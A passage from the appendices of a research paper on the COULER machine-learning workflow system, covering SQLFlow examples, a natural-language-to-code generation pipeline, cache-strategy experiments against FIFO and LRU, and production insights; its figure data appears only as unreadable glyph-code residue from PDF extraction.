[10]\n6COLUMN sepal_len, sepal_width,\n7 petal_length\n8LABEL class\n9INTO sqlflow_models.my_dnn_model;Fig. 9: GUI for the workflow\nBased on the trained model above, the user can submit a\nSQL query to get the validation data, then apply the trained\nmodel to make a prediction B-E over the selected data. The\noutput of SQL is the data with the prediction value. Naturally,\nusers also could start a data analysis job over the predicted\nresults based on SQL.\n1SELECT *\n2FROM iris.test\n3TO PREDICT iris.predict.class\n4USING sqlflow_models.my_dnn_model;\nAPPENDIX C\nRUNNING EXAMPLE OF NL TOUNIFIED PROGRAMMING\nINTERFACE\nWe illustrated an example in Figure 10, displaying the full\nautomated process of converting Natural Language to Unified\nProgramming Coded. The goal of this example is to choose\nthe optimal image classification model from ResNet, ViT,\nand DenseNet, by showcasing the transformation from natural\nlanguage descriptions to code generation.\nStep 1: Modular Decomposition\nInitially, we employed a chain-of-thought strategy to break\ndown the original natural language descriptions into smaller,\nmore concise task modules. For the given workflow descrip-\ntion: I need to design a workflow to select the optimal image\nclassification model... . Through this strategy, we identified the\nfollowing task modules: Data Loading, Model Application\n(ResNet, ViT, DenseNet), Model Training, Model Validation,\nModel Comparison, and Model Selection.\nStep 2: Code Generation\nStep 1: Modular Decomposition\nI have a natural language description of a computational\ntask. Can you help me decompose it into smaller , more\nconcise task modules? The description is: \nStep 2: Code Generation\nI have a concise task module, can you help me\ngenerate code for it? I can give you some reference\ncode:\nThe task is: \nCode_n \uff1a\nStep 3: Self-calibration\nI have generated some code for a specific task. Can\nyou evaluate it and provide a score between 0 and 1 to\nindicate its compliance with predefined templates and\nstandards? A score of 1 means the code fully complies\nwith the standards and templates, and a score of 0\nmeans it does not comply at all. The generated code is:\n[code_n]\nStep 4: User Feedback\nWhen users execute the generated workflow code, they\ncan submit feedback or suggest modifications to the\nLarge Language Model (LLM) should they encounter\nany bugs during the execution.I need to design a workflow to select the optimal image\nclassification model for images. I want to apply the\nResNet, V iT, and DenseNet models respectively . During\nthe model training phase, I will use the ......\nModel Training Module:\nTrain and validate each applied model using the same\ntraining data and validation data.Subtask in Chainsdef train_model(ResNet):\n command = f\"python train.py --model {model_name} --\ntrain_data <train_data> --validation_data <validation\n_data>\" \n return couler .run_container(\n image=\"training-image\",\n command=command.split(\" \"), )Chain-of-Thought\nReference \nCodeCode\nLibrarySimilarity\nsearchFig. 10: Running Example: NL to Unified Programming CodeFor each independent task module, we leveraged Large\nLanguage Models (LLMs) to generate code. Given each mod-\nule has a clear and singular task, this enhances the accuracy\nand reliability of the generated code. For instance, for the\nModel Training task, we generated the relevant code related\nto training models, ensuring all models use the same training\nand validation datasets.\nStep 3: Self-calibration\nSubsequently, we incorporated a self-calibration strategy to\noptimize the generated code. This strategy offers improvement\nsuggestions by comparing the generated code with predefined\ntemplates in terms of similarity, and these suggestions can be\nautomatically applied to refine the code further, ensuring its\ncompliance with C OULER norms and standards. For example,\nthe generated code for model training was compared and\noptimized against a predefined training code template as\nnecessary.\nStep 4: User Feedback\nFinally, users have the opportunity to review and validate\nthe generated C OULER code. If it does not meet users\u2019 require-\nments, they can provide feedback and suggestions. The system\nwill utilize this feedback to optimize the generated code,\nenhancing the precision of code generation in future tasks.\nFor instance, if users find the model comparison methodology\nto be insufficient or biased, they can suggest modifications,\nallowing the system to adjust the code accordingly based on\nuser feedback.\nThrough these steps, we not only transformed natural lan-\nguage descriptions into executable code but also ensured the\nprecision, consistency, and efficiency of the generated code.\nThis enables users with limited programming experience to\neasily realize their computational tasks and workflow needs.\nAPPENDIX D\nCACHE STRATEGY AND CACHE SIZEABLATION\nEXPERIMENTS\nThis section showcases the comparative effects of the\nCOULER caching strategy against the FIFO and LRU caching\nstrategies. Additionally, this section displays the performance\nof the C OULER caching strategy under different cache sizes.\nThe following experimental graphs each show the differences\nin execution time and CPU/GPU utilization for various work-\nflow tasks under different conditions.\nA. Performance Study with Automatic Caching\nFIFO and LRU, as two efficient and universal caching\nstrategies, can effectively improve the cache hit rate and\nresource utilization efficiency during the caching process.\nThis paper compares the C OULER caching strategy with these\ntwo strategies, conducting tests in three scenarios: Image\nSegmentation, Language Model Fine-tuning, and Multimodal\nTraining. The results indicate that compared to the FIFO\nand LRU strategies, the C OULER caching strategy is more\nadaptable to the production environment of workflows. By\nconsidering artifact reconstruction cost, artifact reuse value,\nand artifact caching cost, C OULER achieves higher production\nefficiency.\n/uni00000013 /uni00000015/uni00000013 /uni00000017/uni00000013 /uni00000019/uni00000013 /uni0000001b/uni00000013 /uni00000014/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000029/uni0000002c/uni00000029/uni00000032\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n/uni00000013 /uni00000015/uni00000013 /uni00000017/uni00000013 /uni00000019/uni00000013 /uni0000001b/uni00000013 /uni00000014/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000029/uni0000002c/uni00000029/uni00000032\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055(a) FIFO\n/uni00000013 /uni00000015/uni00000013 /uni00000017/uni00000013 /uni00000019/uni00000013 /uni0000001b/uni00000013 /uni00000014/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni0000002f/uni00000035/uni00000038\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n/uni00000013 /uni00000015/uni00000013 /uni00000017/uni00000013 /uni00000019/uni00000013 /uni0000001b/uni00000013 /uni00000014/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni0000002f/uni00000035/uni00000038\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055 (b) LRU\nFig. 11: Effect of C OULER on Resource Utilization and\nWorkflow Execution Time in Image Segmentation Scenarios\nwith FIFO and LRU Strategies\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013 /uni00000015/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000029/uni0000002c/uni00000029/uni00000032\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013 /uni00000015/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000029/uni0000002c/uni00000029/uni00000032\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n(a) FIFO\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni0000002f/uni00000035/uni00000038\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni0000002f/uni00000035/uni00000038\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055 (b) LRU\nFig. 12: Effect of C OULER on Resource Utilization and\nWorkflow Execution Time in Language Model Fine-tuning\nScenarios with FIFO and LRU Strategies\nB. Performance Study with Cache Sizes\nCache size is a significant factor affecting caching effective-\nness, meaning that discussing the performance of the C OULER\ncaching strategy under more limited cache sizes is valuable.\nThis section details the changes in CPU/GPU utilization when\nthe cache size is set to 10G and 20G, compared to a more\nample 30G. It is observed that when the cache space is smaller,\nthe weight of the Artifact caching cost increases, and simul-\ntaneously, some artifact units no longer meet the conditions\nfor caching, leading to changes in caching situations, which\nin turn alters the workflow operation. When the cache size/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000001b/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000029/uni0000002c/uni00000029/uni00000032\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000001b/uni00000013/uni00000014/uni00000013/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000029/uni0000002c/uni00000029/uni00000032\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055(a) FIFO\n/uni00000013 /uni00000015/uni00000018 /uni00000018/uni00000013 /uni0000001a/uni00000018 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000015/uni00000018\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000001b/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni0000002f/uni00000035/uni00000038\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n/uni00000013 /uni00000015/uni00000018 /uni00000018/uni00000013 /uni0000001a/uni00000018 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000015/uni00000018\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000001b/uni00000013/uni00000014/uni00000013/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni0000002f/uni00000035/uni00000038\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055 (b) LRU\nFig. 13: Effect of C OULER on Resource Utilization and\nWorkflow Execution Time in Multimodal Training Scenarios\nwith FIFO and LRU Strategies\nis more limited, the effectiveness of C OULER decreases, but\noverall, satisfactory results are achieved.\n/uni00000013 /uni00000015/uni00000013 /uni00000017/uni00000013 /uni00000019/uni00000013 /uni0000001b/uni00000013 /uni00000014/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000014/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a\n/uni00000013 /uni00000015/uni00000013 /uni00000017/uni00000013 /uni00000019/uni00000013 /uni0000001b/uni00000013 /uni00000014/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000014/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a\n(a) 10G and 30G\n/uni00000013 /uni00000015/uni00000013 /uni00000017/uni00000013 /uni00000019/uni00000013 /uni0000001b/uni00000013 /uni00000014/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000015/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a\n/uni00000013 /uni00000015/uni00000013 /uni00000017/uni00000013 /uni00000019/uni00000013 /uni0000001b/uni00000013 /uni00000014/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000015/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a (b) 20G and 30G\nFig. 14: Effect of C OULER on Resource Utilization and Work-\nflow Execution Time with Different Cache Sizes in Image\nSegmentation Scenarios\nC. Performance study with Data caching\nWe study how the cache improves the data reading perfor-\nmance. At first, we use the two tables (e.g., ads-a and ads-b)\nfrom the ads recommendation application used in internal, the\ndata is partitioned and stored in the Alibaba ODPS [31] with\nan approximate size of bigger than 10GB per partition. We\nshow how the cache improves the data loading performance,\nas well as how the caching to improves the deep learning\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000014/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000014/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a(a) 10G and 30G\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000015/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000015/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a (b) 20G and 30G\nFig. 15: Effect of C OULER on Resource Utilization and Work-\nflow Execution Time with Different Cache Sizes in Language\nModel Fine-tuning Scenarios\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000001b/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000014/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000001b/uni00000013/uni00000014/uni00000013/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000014/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a\n(a) 10G and 30G\n/uni00000013 /uni00000015/uni00000018 /uni00000018/uni00000013 /uni0000001a/uni00000018 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000015/uni00000018\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000001b/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000015/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a\n/uni00000013 /uni00000015/uni00000018 /uni00000018/uni00000013 /uni0000001a/uni00000018 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000015/uni00000018\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000001b/uni00000013/uni00000014/uni00000013/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000015/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a (b) 20G and 30G\nFig. 16: Effect of C OULER on Resource Utilization and\nWorkflow Execution Time with Different Cache Sizes in\nMultimodal Training Scenarios\nmodel training over CPU and GPU configuration. The cluster\nis a hybrid model with offline and online server computation\nin the same computation node. The reading Pod is configured\nwith an 8 core CPU and 8 GB memory to test the data reading\nthroughput, then the deep learning model is configured with 10\nparameter servers and 20 workers. From Figure 17a, we can\nobserve the cache can improve the data loading performance\ntwice, this confirms the local storage can reduce the cost of\nremote network data accessing.\nSimilarly, we also study the performance of the caching for\nsmall and big file reading. Initially, these files are stored in theremote file system (Alibaba OSS [33] and NAS [29]). For the\nsmall files application, the number of files is more than 10k\nand the total size of files is more than 10GB. The size of a big\nfile is more than 1GB with .zip format, and the total number of\nfiles is more than 10. We test the caching performance based\non the different number of jobs. From Figure 17b, we observe\nthe local cache would improve the data reading speed more\nthan 4 times comparing the data without cache.\n/uni00000044/uni00000047/uni00000056/uni00000042/uni00000044 /uni00000044/uni00000047/uni00000056/uni00000042/uni00000045 /uni00000044/uni00000047/uni00000056/uni00000042/uni00000046 /uni00000044/uni00000047/uni00000056/uni00000042/uni00000047/uni00000013/uni00000018/uni00000014/uni00000013/uni00000014/uni00000018/uni00000015/uni00000013/uni00000015/uni00000018 /uni00000036/uni00000053/uni00000048/uni00000048/uni00000047/uni0000000b/uni00000056/uni00000048/uni00000046/uni00000052/uni00000051/uni00000047/uni00000056/uni0000000c\n/uni00000017/uni00000011/uni0000001c\n/uni00000019/uni00000011/uni00000015\n/uni00000016/uni00000011/uni0000001a\n/uni00000016/uni00000011/uni0000001c/uni00000014/uni00000014/uni00000011/uni00000016\n/uni00000014/uni00000018/uni00000011/uni0000001a\n/uni00000014/uni00000015/uni00000011/uni00000018\n/uni00000015/uni00000013/uni00000011/uni0000001b/uni0000005a/uni00000012/uni00000052/uni00000003/uni00000046/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni0000005a/uni00000003/uni00000046/uni00000044/uni00000046/uni0000004b/uni00000048\n(a) Table cached\n/uni00000056/uni00000050/uni00000044/uni0000004f/uni0000004f /uni00000045/uni0000004c/uni0000004a/uni00000013/uni00000014/uni00000013/uni00000015/uni00000013/uni00000016/uni00000013/uni00000017/uni00000013/uni00000018/uni00000013 /uni00000036/uni00000053/uni00000048/uni00000048/uni00000047/uni0000000b/uni00000056/uni00000048/uni00000046/uni00000052/uni00000051/uni00000047/uni00000056/uni0000000c\n/uni00000016/uni00000014/uni00000011/uni00000013\n/uni00000017/uni0000001c/uni00000011/uni00000013/uni00000016/uni0000001a/uni00000011/uni00000013\n/uni00000017/uni00000013/uni00000011/uni00000013/uni00000014/uni00000015/uni00000011/uni00000013\n/uni00000014/uni00000018/uni00000011/uni00000013/uni00000032/uni00000036/uni00000036\n/uni00000031/uni00000024/uni00000036\n/uni00000032/uni00000036/uni00000036/uni00000010/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048 (b) File cached\nFig. 17: Performance of data caching\nAPPENDIX E\nPRODUCTION INSIGHTS OF COULER\nOur work is fundamentally motivated by the challenges\nhighlighted in earlier research [53] in Google GCP, specifically\nthe observation of significant computational waste in machine\nlearning (ML) workflows. This previous work provides a\nthorough analysis of 3000 ML production pipelines, reveal-\ning critical insights such as coarse-grained characteristics of\nthese pipelines and the introduction of model graphlets. This\nanalysis identified a crucial problem: a substantial amount\nof computation in these workflows does not lead to model\ndeployment, thereby representing a significant inefficiency.\nThis issue has emerged in our production environment as well,\nand we\u2019ve noted similar observations about the workflow.\nBuilding upon these findings, our contribution is directly\naimed at addressing these inefficiencies. Our work revolves\naround designing a system for unified ML workflow optimiza-\ntion in the cloud. The contributions of our work are multi-\nfaceted: Simplicity and Extensibility, Automation, Efficiency\nand Real-World Impact and Adoption.\nAs for the insights from production in our experimental\nresults, we believe the real-world adoption and application of\nour system within Ant Group and other companies serve as a\ntestament to its practical value and effectiveness in production\nenvironments. The feedback and data obtained from these\nimplementations have been crucial in refining our system\nto ensure it addresses the real-world challenges identified\nin previous studies.For example, the design of the workflow\nbuilding block is as intuitive as procedural coding, inspired\nby real-world application workflow management. Similarly,\nthe issue with large workflows is also driven by practical\napplications. Previously, we assumed that workflow sizes, and\nconsequently the related YAML sizes, would not exceed 2MB.\nHowever, we\u2019ve found that data scientists aim to construct\nvery large workflows with hundreds of nodes and associatedworking procedures. This has directly influenced us to divide\nlarge workflows into smaller ones.\nIn conclusion, our work not only builds on the problems\nidentified in earlier research but also provides tangible, applied\nsolutions that have 